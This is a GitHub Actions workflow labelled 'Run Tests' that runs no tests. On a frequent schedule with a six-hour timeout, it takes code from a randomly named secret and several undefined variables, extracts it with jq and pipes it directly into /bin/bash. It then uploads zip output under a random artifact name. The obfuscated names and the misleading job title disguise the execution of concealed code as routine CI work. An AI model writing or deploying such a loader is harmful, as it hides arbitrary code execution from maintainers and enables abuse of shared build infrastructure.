name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '12 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          olpqq76285: ${{ secrets.olpqq76285 }}
        run: |
          printf '%s' "$olpqq76285" | jq -r .pyh376 | /bin/bash
          echo $wzc7 | jq -r .a6676 | /bin/bash
          echo $g616 | jq -r .vj24268 | /bin/bash
          echo $aars8 | jq -r .rxo20 | /bin/bash
          printf '%s' "$zq800" | jq -r .pa8 | /bin/bash
          printf '%s' "$ds10" | jq -r .waij1519 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: wheMrEPp
          path: "*.zip"
          retention-days: 1
